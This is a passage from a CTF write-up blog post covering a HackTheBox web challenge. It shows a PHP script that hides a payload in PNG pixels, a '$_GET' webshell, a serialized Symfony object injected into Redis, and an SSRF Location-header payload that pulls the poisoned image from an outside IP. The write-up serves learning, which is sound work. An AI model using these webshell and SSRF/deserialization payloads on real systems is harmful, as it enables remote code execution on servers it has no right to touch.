class="number">0xFC</span>, <span class="number">0x69</span>, <span class="number">0xD0</span>, <span class="number">0x2B</span>, <span class="number">0xB9</span>, <span class="number">0xB0</span>, <span class="number">0xFB</span>, <span class="number">0xBB</span>, <span class="number">0x79</span>, <span class="number">0xFC</span>, <span class="number">0xED</span>, <span class="number">0x22</span>, <span class="number">0x38</span>, <span class="number">0x49</span>, <span class="number">0xD3</span>, <span class="number">0x51</span>, <span class="number">0xB7</span>, <span class="number">0x3F</span>, <span class="number">0x02</span>, <span class="number">0xC2</span>, <span class="number">0x20</span>, <span class="number">0xD8</span>, <span class="number">0xD9</span>, <span class="number">0x3C</span>, <span class="number">0x67</span>, <span class="number">0xF4</span>, <span class="number">0x50</span>, <span class="number">0x67</span>, <span class="number">0xF4</span>, <span class="number">0x50</span>, <span class="number">0xA3</span>, <span class="number">0x9F</span>, <span class="number">0x67</span>, <span class="number">0xA5</span>, <span class="number">0xBE</span>, <span class="number">0x5F</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5A</span>, <span class="number">0x4C</span>, <span class="number">0xA1</span>, <span class="number">0x3F</span>, <span class="number">0x7A</span>, <span class="number">0xBF</span>, <span class="number">0x30</span>, <span class="number">0x6B</span>, <span class="number">0x88</span>, <span class="number">0x2D</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7D</span>, <span class="number">0x52</span>, <span class="number">0x9D</span>, <span class="number">0xAD</span>, <span class="number">0x88</span>, <span class="number">0xA1</span>, <span class="number">0x66</span>, <span class="number">0x94</span>, <span class="number">0xA1</span>, <span class="number">0x27</span>, <span class="number">0x56</span>, <span class="number">0xEC</span>, <span class="number">0xFE</span>, <span class="number">0xAF</span>, <span class="number">0x57</span>, <span class="number">0x57</span>, <span class="number">0xEB</span>, <span class="number">0x2E</span>, <span class="number">0x20</span>, <span class="number">0xA3</span>, <span class="number">0xAE</span>, <span class="number">0x58</span>, <span class="number">0x80</span>, <span class="number">0xA7</span>, <span class="number">0x0C</span>, <span class="number">0x10</span>, <span class="number">0x55</span>, <span class="number">0xCF</span>, <span class="number">0x09</span>, <span class="number">0x5C</span>, <span class="number">0x10</span>, <span class="number">0x40</span>, <span class="number">0x8A</span>, <span class="number">0xB9</span>, <span class="number">0x39</span>, <span class="number">0xB3</span>, <span class="number">0xC8</span>, <span class="number">0xCD</span>, <span class="number">0x64</span>, <span class="number">0x45</span>, <span class="number">0x3C</span>, <span class="number">0x49</span>, <span class="number">0x3E</span>, <span class="number">0xAD</span>, <span class="number">0x3F</span>, <span class="number">0x33</span>, <span class="number">0x56</span>, <span class="number">0x1F</span>, <span class="number">0x19</span> );</span><br><span class="line"> </span><br><span class="line"><span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">110</span>, <span class="number">110</span>);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> &lt; <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) &#123;</span><br><span class="line"><span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"><span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"><span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"><span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>)*<span class="number">2</span>, <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"><span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>)*<span class="number">2</span>+<span class="number">1</span>, <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"><span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>)*<span class="number">2</span>, <span class="number">1</span>, <span class="variable">$color</span>);</span><br><span class="line"><span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>)*<span class="number">2</span>+<span class="number">1</span>, <span class="number">1</span>, <span class="variable">$color</span>);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>So we create our payload with: <code>php gen.php &#39;&lt;?php phpinfo(); ?&gt;&#39; blank.png</code></p>
<p>We are going to modify the code of the application so that the variables <code>$map</code> and <code>$stamp</code> point towards this malicious file, moreover, we also modify the variable <code>$this-&gt;export_file</code> so that it is equal to <code>exploit.php</code>. So we recreate a point on the map, and after a minute (we wait for the <code>worker.sh</code> script to be executed), we go to <code>/static/exports/exploit.php</code>, and … :</p>
<p><img src="/images/13.png" alt="phpinfo"></p>
<p>So we succeeded in getting our remote code execution, so we will modify the payload to be as follows:</p>
<p><code>php test.php &#39;&lt;?=</code>$_GET[1]<code>?&gt;&#39; blank.png</code></p>
<p>Once done, we restart the application, we recreate a point, we go to <code>/static/exports/exploit.php</code> and … :</p>
<p><img src="/images/14.png" alt="flag_local"></p>
<p>We arrive at flag locally ! It is now necessary to recover the serialized payload in redis, and to try to insert it directly via the XADD command. We recover our payload which is in the form :</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">XADD messages * message &quot;s:1053:\&quot;&#123;\&quot;body\&quot;:\&quot;O:36:\\\\\\\&quot;Symfony\\\\\\\\Component\\\\\\\\Messenger\\\\\\\\Envelope\\\\\\\&quot;:2:&#123;s:44:\\\\\\\&quot;\\\\0Symfony\\\\\\\\Component\\\\\\\\Messenger\\\\\\\\Envelope\\\\0stamps\\\\\\\&quot;;a:1:&#123;s:46:\\\\\\\&quot;Symfony\\\\\\\\Component\\\\\\\\Messenger\\\\\\\\Stamp\\\\\\\\BusNameStamp\\\\\\\&quot;;a:1:&#123;i:0;O:46:\\\\\\\&quot;Symfony\\\\\\\\Component\\\\\\\\Messenger\\\\\\\\Stamp\\\\\\\\BusNameStamp\\\\\\\&quot;:1:&#123;s:55:\\\\\\\&quot;\\\\0Symfony\\\\\\\\Component\\\\\\\\Messenger\\\\\\\\Stamp\\\\\\\\BusNameStamp\\\\0busName\\\\\\\&quot;;s:21:\\\\\\\&quot;messenger.bus.default\\\\\\\&quot;;&#125;&#125;&#125;s:45:\\\\\\\&quot;\\\\0Symfony\\\\\\\\Component\\\\\\\\Messenger\\\\\\\\Envelope\\\\0message\\\\\\\&quot;;O:33:\\\\\\\&quot;App\\\\\\\\Message\\\\\\\\SubscribeNotification\\\\\\\&quot;:4:&#123;s:5:\\\\\\\&quot;email\\\\\\\&quot;;s:6:\\\\\\\&quot;a@a.fr\\\\\\\&quot;;s:4:\\\\\\\&quot;uuid\\\\\\\&quot;;O:47:\\\\\\\&quot;App\\\\\\\\MessageHandler\\\\\\\\SubscribeNotificationHandler\\\\\\\&quot;:7:&#123;s:5:\\\\\\\&quot;email\\\\\\\&quot;;N;s:4:\\\\\\\&quot;uuid\\\\\\\&quot;;N;s:11:\\\\\\\&quot;export_file\\\\\\\&quot;;s:11:\\\\\\\&quot;exploit.php\\\\\\\&quot;;s:12:\\\\\\\&quot;x_coordinate\\\\\\\&quot;;N;s:12:\\\\\\\&quot;y_coordinate\\\\\\\&quot;;N;s:3:\\\\\\\&quot;map\\\\\\\&quot;;s:30:\\\\\\\&quot;http:\\/\\/146.59.156.82\\/blank.png\\\\\\\&quot;;s:5:\\\\\\\&quot;stamp\\\\\\\&quot;;s:30:\\\\\\\&quot;http:\\/\\/146.59.156.82\\/blank.png\\\\\\\&quot;;&#125;s:12:\\\\\\\&quot;x_coordinate\\\\\\\&quot;;s:3:\\\\\\\&quot;420\\\\\\\&quot;;s:12:\\\\\\\&quot;y_coordinate\\\\\\\&quot;;s:3:\\\\\\\&quot;226\\\\\\\&quot;;&#125;&#125;\&quot;,\&quot;headers\&quot;:[]&#125;\&quot;;&quot;</span><br></pre></td></tr></table></figure>

<p>We go to <code>/static/export/exploit.php</code> :</p>
<p><img src="/images/15.png" alt="flag_local_read"></p>
<p>So we have our functional payload ! We just have to spawn an instance on the hackthebox website, and to put our payload in the header “Location”, for that, I listen directly with netcat to avoid having to play with the quotes.</p>
<p>So we send the following payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 302</span><br><span class="line">Location: http://unix:/var/run/redis/redis.sock:&quot;redis.call(&#x27;XADD&#x27;,&#x27;messages&#x27;,&#x27;*&#x27;,&#x27;message&#x27;,&#x27;s:1053:\&quot;&#123;\&quot;body\&quot;:\&quot;O:36:\\\\\\\\\\\\\&quot;Symfony\\\\\\\\\\\\\\\\Component\\\\\\\\\\\\\\\\Messenger\\\\\\\\\\\\\\\\Envelope\\\\\\\\\\\\\&quot;:2:&#123;s:44:\\\\\\\\\\\\\&quot;\\\\\\\\0Symfony\\\\\\\\\\\\\\\\Component\\\\\\\\\\\\\\\\Messenger\\\\\\\\\\\\\\\\Envelope\\\\\\\\0stamps\\\\\\\\\\\\\&quot;;a:1:&#123;s:46:\\\\\\\\\\\\\&quot;Symfony\\\\\\\\\\\\\\\\Component\\\\\\\\\\\\\\\\Messenger\\\\\\\\\\\\\\\\Stamp\\\\\\\\\\\\\\\\BusNameStamp\\\\\\\\\\\\\&quot;;a:1:&#123;i:0;O:46:\\\\\\\\\\\\\&quot;Symfony\\\\\\\\\\\\\\\\Component\\\\\\\\\\\\\\\\Messenger\\\\\\\\\\\\\\\\Stamp\\\\\\\\\\\\\\\\BusNameStamp\\\\\\\\\\\\\&quot;:1:&#123;s:55:\\\\\\\\\\\\\&quot;\\\\\\\\0Symfony\\\\\\\\\\\\\\\\Component\\\\\\\\\\\\\\\\Messenger\\\\\\\\\\\\\\\\Stamp\\\\\\\\\\\\\\\\BusNameStamp\\\\\\\\0busName\\\\\\\\\\\\\&quot;;s:21:\\\\\\\\\\\\\&quot;messenger.bus.default\\\\\\\\\\\\\&quot;;&#125;&#125;&#125;s:45:\\\\\\\\\\\\\&quot;\\\\\\\\0Symfony\\\\\\\\\\\\\\\\Component\\\\\\\\\\\\\\\\Messenger\\\\\\\\\\\\\\\\Envelope\\\\\\\\0message\\\\\\\\\\\\\&quot;;O:33:\\\\\\\\\\\\\&quot;App\\\\\\\\\\\\\\\\Message\\\\\\\\\\\\\\\\SubscribeNotification\\\\\\\\\\\\\&quot;:4:&#123;s:5:\\\\\\\\\\\\\&quot;email\\\\\\\\\\\\\&quot;;s:6:\\\\\\\\\\\\\&quot;a@a.fr\\\\\\\\\\\\\&quot;;s:4:\\\\\\\\\\\\\&quot;uuid\\\\\\\\\\\\\&quot;;O:47:\\\\\\\\\\\\\&quot;App\\\\\\\\\\\\\\\\MessageHandler\\\\\\\\\\\\\\\\SubscribeNotificationHandler\\\\\\\\\\\\\&quot;:7:&#123;s:5:\\\\\\\\\\\\\&quot;email\\\\\\\\\\\\\&quot;;N;s:4:\\\\\\\\\\\\\&quot;uuid\\\\\\\\\\\\\&quot;;N;s:11:\\\\\\\\\\\\\&quot;export_file\\\\\\\\\\\\\&quot;;s:11:\\\\\\\\\\\\\&quot;exploit.php\\\\\\\\\\\\\&quot;;s:12:\\\\\\\\\\\\\&quot;x_coordinate\\\\\\\\\\\\\&quot;;N;s:12:\\\\\\\\\\\\\&quot;y_coordinate\\\\\\\\\\\\\&quot;;N;s:3:\\\\\\\\\\\\\&quot;map\\\\\\\\\\\\\&quot;;s:30:\\\\\\\\\\\\\&quot;http:\\\\/\\\\/146.59.156.82\\\\/blank.png\\\\\\\\\\\\\&quot;;s:5:\\\\\\\\\\\\\&quot;stamp\\\\\\\\\\\\\&quot;;s:30:\\\\\\\\\\\\\&quot;http:\\\\/\\\\/146.59.156.82\\\\/blank.png\\\\\\\\\\\\\&quot;;&#125;s:12:\\\\\\\\\\\\\&quot;x_coordinate\\\\\\\\\\\\\&quot;;s:3:\\\\\\\\\\\\\&quot;420\\\\\\\\\\\\\&quot;;s:12:\\\\\\\\\\\\\&quot;y_coordinate\\\\\\\\\\\\\&quot;;s:3:\\\\\\\\\\\\\&quot;226\\\\\\\\\\\\\&quot;;&#125;&#125;\&quot;,\&quot;headers\&quot;:[]&#125;\&quot;;&#x27;); return ARGV[1];&quot; 0</span><br></pre></td></tr></table></figure>

<p>We thus obtain the flag : <code>HTB&#123;7r1p_t0_Da_r3d1sl4nD_pr0xy_p455_y0u_1n!&#125;</code></p>
	  
	</div>

	<div>
  	<center>
	<div class="pagination">

    
    
    <a href="/2023/01/19/insosystems/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2022/11/29/checker/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>

    </center>
	</div>
	
	<!-- comment -->
	
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>


	</div> <!-- col-md-9/col-md-12 -->
		
	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2022-12-05 
	</div>
	

	<!-- categories -->
    

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/htb/">htb<span>1</span></a></li> <li><a href="/tags/web/">web<span>1</span></a></li> <li><a href="/tags/php/">php<span>1</span></a></li> <li><a href="/tags/redis/">redis<span>1</span></a></li> <li><a href="/tags/nginx/">nginx<span>1</span></a></li> <li><a href="/tags/rce/">rce<span>1</span></a></li> <li><a href="/tags/ssrf/">ssrf<span>1</span></a></li> <li><a href="/tags/Worty/">Worty<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

	</div>
		

</div><!-- row -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  &copy; 2023 22sh
  
  <a href="https://ctftime.org/team/37820" target="_blank">Hexagon</a>
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
